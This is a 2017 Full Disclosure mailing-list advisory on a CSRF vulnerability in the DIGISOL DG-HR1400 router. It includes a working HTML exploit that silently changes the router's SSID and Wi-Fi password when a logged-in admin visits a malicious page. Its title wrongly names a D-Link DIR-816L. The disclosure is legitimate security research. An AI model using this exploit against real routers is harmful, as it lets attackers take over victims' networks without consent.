Message-ID: <CACP8YJk2L_NLOe7S42Vr70YiDtKwztFvTCK9mi+QorngewZNZw@mail.gmail.com>
Date: Tue, 21 Feb 2017 13:24:16 +0530
From: Indrajith AN <indu.an444@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Multiple cross-site request forgery (CSRF) vulnerabilities in
 the DIGISOL (DG-HR 1400) Wireless Router

Title:
====

D-link wireless router DIR-816L – Cross-Site Request Forgery (CSRF)
vulnerability

Credit:
======

Name: Indrajith.A.N

Date:
====

21-02-2017

Vendor:
======

DIGISOL router is a product of Smartlink Network Systems Ltd. is one of
India's leading networking company. It was established in the year 1993 to
prop the Indian market in the field of Network Infrastructure.

Product:
=======


DIGISOL DG-HR1400 is a wireless Router


Product link: http://wifi.digisol.com/datasheets/DG-HR1400.pdf

Abstract:
=======

Cross-Site Request Forgery (CSRF) vulnerability in the DIGISOL DG-HR1400
wireless router enables an attacker to perform an
unwanted action on a wireless router for which the user/admin is currently
authenticated.


Affected Version:
=============

<=1.00.02


Exploitation-Technique:
===================


Remote


Severity Rating:
===================

7.9



Details:
=======


An attacker who lures a DG-HR1400 authenticated user to browse a malicious
website can exploit cross site request
forgery (CSRF) to submit commands to wireless router and gain control of
the product. The attacker could
submit variety of commands including but not limited to changing the SSID
name, password, security type etc.


Proof Of Concept:
================


1) User login to DG-HR1400 wireless router


2) User visits the attacker's malicious web page (attack.html)


3) attack.html exploits CSRF vulnerability and changes the SSID name and
password


PoC video link:
https://drive.google.com/file/d/0B6715xUqH18MeV9GOVE0ZmFrQUU/view


Exploit code (attack.html):


<html>
   Digisol Router CSRF Exploit - Indrajith A.N
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.2.1/form2WlanBasicSetup.cgi" method="POST">
      <input type="hidden" name="mode" value="0" />
      <input type="hidden" name="apssid" value="hacked" />
      <input type="hidden" name="startScanUplinkAp" value="0" />
      <input type="hidden" name="domain" value="1" />
      <input type="hidden" name="hiddenSSID" value="on" />
      <input type="hidden" name="ssid" value="hacked" />
      <input type="hidden" name="band" value="10" />
      <input type="hidden" name="chan" value="6" />
      <input type="hidden" name="chanwid" value="1" />
      <input type="hidden" name="txRate" value="0" />
      <input type="hidden" name="method&#95;cur" value="6" />
      <input type="hidden" name="method" value="6" />
      <input type="hidden" name="authType" value="2" />
      <input type="hidden" name="length" value="1" />
      <input type="hidden" name="format" value="2" />
      <input type="hidden" name="defaultTxKeyId" value="1" />
      <input type="hidden" name="key1" value="0000000000" />
      <input type="hidden" name="pskFormat" value="0" />
      <input type="hidden" name="pskValue" value="csrf1234" />
      <input type="hidden" name="checkWPS2" value="1" />
      <input type="hidden" name="save" value="Apply" />
      <input type="hidden" name="basicrates" value="15" />
      <input type="hidden" name="operrates" value="4095" />
      <input type="hidden" name="submit&#46;htm&#63;wlan&#95;basic&#46;htm"
value="Send" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


Credits:
=======

Indrajith.A.N

Security Analyst.

https://www.indrajithan.com/


-- 
Indrajith

View attachment "digisol CSRF POC.html" of type "text/html" (1713 bytes)

Download attachment "Digisol router info.png" of type "image/png" (143690 bytes)


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists